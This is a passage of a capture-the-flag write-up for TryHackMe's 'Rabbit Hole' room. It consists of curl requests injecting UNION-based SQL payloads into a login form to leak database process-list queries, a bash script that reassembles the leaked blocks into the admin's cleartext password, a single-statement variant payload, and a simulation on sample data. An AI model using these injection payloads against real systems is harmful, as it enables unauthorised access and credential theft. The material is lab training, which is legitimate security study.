curl -i -s -k -X $'POST' \
    -H $'Host: rabbithole.thm' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 198' -H $'Origin: http://rabbithole.thm' -H $'Connection: close' -H $'Referer: http://rabbithole.thm/login.php' -H $'Upgrade-Insecure-Requests: 1' \
    -b $'PHPSESSID=6' \
    --data-binary $'username=/\" UNION SELECT 1, SUBSTRING((SELECT INFO FROM information_schema.PROCESSLIST WHERE ID = (SELECT MIN(ID) FROM information_schema.PROCESSLIST)), 81, 16) -- -&password=asdf&login=Submit+Query' \
    $'http://rabbithole.thm/login.php'    
curl -i -s -k -X $'POST' \
    -H $'Host: rabbithole.thm' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 198' -H $'Origin: http://rabbithole.thm' -H $'Connection: close' -H $'Referer: http://rabbithole.thm/login.php' -H $'Upgrade-Insecure-Requests: 1' \
    -b $'PHPSESSID=7' \
    --data-binary $'username=/\" UNION SELECT 1, SUBSTRING((SELECT INFO FROM information_schema.PROCESSLIST WHERE ID = (SELECT MIN(ID) FROM information_schema.PROCESSLIST)), 97, 16) -- -&password=asdf&login=Submit+Query' \
    $'http://rabbithole.thm/login.php'    
curl -i -s -k -X $'POST' \
    -H $'Host: rabbithole.thm' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 199' -H $'Origin: http://rabbithole.thm' -H $'Connection: close' -H $'Referer: http://rabbithole.thm/login.php' -H $'Upgrade-Insecure-Requests: 1' \
    -b $'PHPSESSID=8' \
    --data-binary $'username=/\" UNION SELECT 1, SUBSTRING((SELECT INFO FROM information_schema.PROCESSLIST WHERE ID = (SELECT MIN(ID) FROM information_schema.PROCESSLIST)), 113, 16) -- -&password=asdf&login=Submit+Query' \
    $'http://rabbithole.thm/login.php'    
curl -i -s -k -X $'POST' \
    -H $'Host: rabbithole.thm' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 199' -H $'Origin: http://rabbithole.thm' -H $'Connection: close' -H $'Referer: http://rabbithole.thm/login.php' -H $'Upgrade-Insecure-Requests: 1' \
    -b $'PHPSESSID=9' \
    --data-binary $'username=/\" UNION SELECT 1, SUBSTRING((SELECT INFO FROM information_schema.PROCESSLIST WHERE ID = (SELECT MIN(ID) FROM information_schema.PROCESSLIST)), 129, 16) -- -&password=asdf&login=Submit+Query' \
    $'http://rabbithole.thm/login.php'    
curl -i -s -k -X $'POST' \
    -H $'Host: rabbithole.thm' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 199' -H $'Origin: http://rabbithole.thm' -H $'Connection: close' -H $'Referer: http://rabbithole.thm/login.php' -H $'Upgrade-Insecure-Requests: 1' \
    -b $'PHPSESSID=10' \
    --data-binary $'username=/\" UNION SELECT 1, SUBSTRING((SELECT INFO FROM information_schema.PROCESSLIST WHERE ID = (SELECT MIN(ID) FROM information_schema.PROCESSLIST)), 145, 16) -- -&password=asdf&login=Submit+Query' \
    $'http://rabbithole.thm/login.php'    
curl -i -s -k -X $'POST' \
    -H $'Host: rabbithole.thm' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 199' -H $'Origin: http://rabbithole.thm' -H $'Connection: close' -H $'Referer: http://rabbithole.thm/login.php' -H $'Upgrade-Insecure-Requests: 1' \
    -b $'PHPSESSID=11' \
    --data-binary $'username=/\" UNION SELECT 1, SUBSTRING((SELECT INFO FROM information_schema.PROCESSLIST WHERE ID = (SELECT MIN(ID) FROM information_schema.PROCESSLIST)), 161, 16) -- -&password=asdf&login=Submit+Query' \
    $'http://rabbithole.thm/login.php'      
curl -i -s -k -X $'POST' \
    -H $'Host: rabbithole.thm' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 199' -H $'Origin: http://rabbithole.thm' -H $'Connection: close' -H $'Referer: http://rabbithole.thm/login.php' -H $'Upgrade-Insecure-Requests: 1' \
    -b $'PHPSESSID=12' \
    --data-binary $'username=/\" UNION SELECT 1, SUBSTRING((SELECT INFO FROM information_schema.PROCESSLIST WHERE ID = (SELECT MIN(ID) FROM information_schema.PROCESSLIST)), 177, 16) -- -&password=asdf&login=Submit+Query' \
    $'http://rabbithole.thm/login.php' 
curl -i -s -k -X $'POST' \
    -H $'Host: rabbithole.thm' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 199' -H $'Origin: http://rabbithole.thm' -H $'Connection: close' -H $'Referer: http://rabbithole.thm/login.php' -H $'Upgrade-Insecure-Requests: 1' \
    -b $'PHPSESSID=13' \
    --data-binary $'username=/\" UNION SELECT 1, SUBSTRING((SELECT INFO FROM information_schema.PROCESSLIST WHERE ID = (SELECT MIN(ID) FROM information_schema.PROCESSLIST)), 193, 16) -- -&password=asdf&login=Submit+Query' \
    $'http://rabbithole.thm/login.php'    
curl -i -s -k -X $'POST' \
    -H $'Host: rabbithole.thm' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 199' -H $'Origin: http://rabbithole.thm' -H $'Connection: close' -H $'Referer: http://rabbithole.thm/login.php' -H $'Upgrade-Insecure-Requests: 1' \
    -b $'PHPSESSID=14' \
    --data-binary $'username=/\" UNION SELECT 1, SUBSTRING((SELECT INFO FROM information_schema.PROCESSLIST WHERE ID = (SELECT MIN(ID) FROM information_schema.PROCESSLIST)), 209, 16) -- -&password=asdf&login=Submit+Query' \
    $'http://rabbithole.thm/login.php'    

```

{% endcode %}

The script may take a while to complete.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2Ft1TdcEnCaG1fkcnUmzeH%2Fgrafik.png?alt=media&#x26;token=86f27ed6-84f1-467e-8266-322502cf356e" alt=""><figcaption></figcaption></figure>

Once all 14 sessions are logged in, we request the index page with each session cookie in turn. Every session carries one of the injected payloads, and the leak is recomputed on each page load, so each session shows a different 16-character block of whatever query happens to be running at that moment. The screenshot shows the queries that get triggered while loading the index page.

{% code overflow="wrap" %}

```bash
curl -s http://rabbithole.thm -H 'Cookie: PHPSESSID=1' | grep -o '<tr><td>.*</td>' | tail -1 | sed -e 's/<[^>]*>//g'
```

{% endcode %}

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FWMksmETFC6dDSInOAuJx%2Fgrafik.png?alt=media&#x26;token=4fb2cec9-3caa-4b32-9bcf-581e5c90f6fe" alt=""><figcaption></figcaption></figure>

To automate this, the following script requests the index page once per session, strips the HTML around the leaked block, and concatenates the 14 blocks in order.

{% code title="retrieve.sh" overflow="wrap" lineNumbers="true" %}

```bash
#!/bin/bash

# Initialize an empty variable to store concatenated output
result=""

# Loop through each session ID from 1 to 14
for i in {1..14}; do
  # Get the relevant data and strip HTML tags
  output=$(curl -s http://rabbithole.thm -H "Cookie: PHPSESSID=$i" | grep -o '<tr><td>.*</td>' | tail -1 | sed -e 's/<[^>]*>//g')
  
  result+="$output"
done

# Print the final concatenated result
echo "$result"

```

{% endcode %}

We run the script several times until one run coincides with the admin's login. The reassembled query then contains the password in clear text.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FBSGxW4g0QQQpsCFxeGjc%2Fgrafik.png?alt=media&#x26;token=7a0184f4-1b60-440a-8542-dc069a2e22b9" alt=""><figcaption></figcaption></figure>

With that password we can log in as `admin` via SSH and find the flag in the user's home directory.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FIePCOuvit41oxNd8k3Pr%2Fgrafik.png?alt=media&#x26;token=bb05171a-5689-47a0-beb4-b732c1af273d" alt=""><figcaption></figcaption></figure>

## One SQL Statement To Rule Them All

Shamollash kindly shared an SQL statement that leaks the desired information in a single run. Each `UNION ALL` branch selects one 16-character block of the `info` column, so every block ends up in its own row of the result. The `WHERE info NOT LIKE '%info%'` clause filters out the queries we create with this payload, since they contain the string `info` themselves, so only other clients' statements are returned. We register a user with this payload as the username and reload the page until the desired information leaks.

```sql
0" union all select null,mid(info,1,16) from information_schema.processlist where info not like '%info%'
union all select null,mid(info,17,16) from information_schema.processlist where info not like '%info%'
union all select null,mid(info,33,16) from information_schema.processlist where info not like '%info%'
union all select null,mid(info,49,16) from information_schema.processlist where info not like '%info%'
union all select null,mid(info,65,16) from information_schema.processlist where info not like '%info%'
union all select null,mid(info,81,16) from information_schema.processlist where info not like '%info%'
union all select null,mid(info,97,16) from information_schema.processlist where info not like '%info%'
union all select null,mid(info,113,16) from information_schema.processlist where info not like '%info%'
union all select null,mid(info,129,16) from information_schema.processlist where info not like '%info%'
union all select null,mid(info,145,16) from information_schema.processlist where info not like '%info%' -- -
```
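To make the slicing arithmetic of the per-session method and the self-filtering trick of the single statement concrete, here is an added Python simulation. It is my example, not code from the room, the write-up or Shamollash. It emulates MySQL's `SUBSTRING()`/`MID()` and the `MIN(ID)` targeting, reassembles the 14 blocks, and applies the `NOT LIKE '%info%'` filter. Everything in it is constructed: the process list rows, the admin login query and the password `Sample-Passw0rd!` are sample data, and `extract_password()` assumes the login statement carries the password as a double-quoted literal, which the page does not show.

```python
"""Simulation of the information_schema.PROCESSLIST leak from the write-up.

Added example, not code from the room or the write-up. The process list rows,
the admin login query and the password below are CONSTRUCTED sample data.
"""
import re

WIDTH = 16  # the injected payloads read the INFO column 16 characters at a time


def window_starts(max_len, width=WIDTH):
    """1-based start offsets as MySQL SUBSTRING()/MID() expect: 1, 17, 33, ..."""
    return list(range(1, max_len + 1, width))


def login_payload(start, width=WIDTH):
    """The username the write-up posts to login.php to read one window of the
    query running on the connection with the lowest PROCESSLIST ID."""
    return (
        '/" UNION SELECT 1, SUBSTRING((SELECT INFO FROM information_schema.PROCESSLIST '
        'WHERE ID = (SELECT MIN(ID) FROM information_schema.PROCESSLIST)), '
        f'{start}, {width}) -- -'
    )


def mysql_substring(value, start, length):
    """Emulate SUBSTRING(str, pos, len) for pos >= 1: NULL stays NULL and a
    window past the end of the string is the empty string, not an error."""
    if value is None:
        return None
    if start < 1:
        raise ValueError("only positive positions are emulated")
    return value[start - 1:start - 1 + length]


def leak_windows(processlist, sessions=14, width=WIDTH):
    """What sessions 1..14 each show on one reload: the INFO of the lowest-ID
    connection in consecutive 16-character windows. MIN(ID) counts idle
    connections too, so if the oldest connection is sleeping (INFO is NULL)
    every window comes back NULL and the round leaks nothing."""
    oldest = min(processlist, key=lambda row: row["ID"])
    return [mysql_substring(oldest["INFO"], s, width)
            for s in window_starts(sessions * width, width)]


def foreign_windows(processlist, branches=10, width=WIDTH):
    """Shamollash's single statement: one UNION ALL branch per window, and
    `info NOT LIKE '%info%'` drops every query that itself mentions `info`,
    which is exactly our injected statements (they name information_schema).
    Rows come back grouped by branch, so with more than one foreign client
    the windows of different queries interleave."""
    others = [row for row in processlist
              if row["INFO"] is not None and "info" not in row["INFO"].lower()]
    return [mysql_substring(row["INFO"], s, width)
            for s in window_starts(branches * width, width)
            for row in others]


def reassemble(windows):
    """Concatenate the windows; NULL and empty windows contribute nothing."""
    return "".join(w for w in windows if w)


def extract_password(query):
    """Assumption for this example: the login statement carries the password
    as a double-quoted literal. The page only states that the leaked query
    reveals the password, not its exact shape."""
    match = re.search(r'password\s*=\s*"([^"]*)"', query or "", re.IGNORECASE)
    return match.group(1) if match else None


# Constructed sample process list (not captured from the room).
ADMIN_LOGIN = ('SELECT id, username FROM users WHERE username = "admin" '
               'AND password = "Sample-Passw0rd!"')
SAMPLE_PROCESSLIST = [
    {"ID": 3, "INFO": ADMIN_LOGIN},                        # the periodic admin login
    {"ID": 7, "INFO": 'SELECT id, username FROM users WHERE username = "'
                      + login_payload(1) + '"'},          # one of our own sessions
    {"ID": 9, "INFO": None},                               # an idle connection
]
# A reload while the admin is not logging in: the oldest connection is idle,
# so the per-session method leaks nothing this round and we must retry.
QUIET_PROCESSLIST = [{"ID": 2, "INFO": None},
                     {"ID": 7, "INFO": SAMPLE_PROCESSLIST[1]["INFO"]}]

if __name__ == "__main__":
    print("windows:", leak_windows(SAMPLE_PROCESSLIST))
    print("password:", extract_password(reassemble(leak_windows(SAMPLE_PROCESSLIST))))
    print("quiet round:", extract_password(reassemble(leak_windows(QUIET_PROCESSLIST))))
    print("one statement:", reassemble(foreign_windows(SAMPLE_PROCESSLIST)))
```

Two things the simulation makes visible that the curl loop does not: `MIN(ID)` also counts sleeping connections, so a round in which the oldest connection is idle returns NULL for every window, which is why the script has to be re-run until the admin's login is caught; and the single statement returns the windows of every foreign client grouped by branch, so with more than one such client the blocks of different queries interleave and have to be split by connection before concatenating.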

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FLFSYRGIG3Wi3e7TNNwR1%2Fgrafik.png?alt=media&#x26;token=c50d7aad-f896-44e6-b7f7-4b5539ba7790" alt=""><figcaption></figcaption></figure>

## Recommendation

Don't miss out on Jaxafed's approach, which involves manipulating the database to write information into the ID of the users table:

{% embed url="<https://jaxafed.github.io/posts/tryhackme-rabbit_hole/>" %}
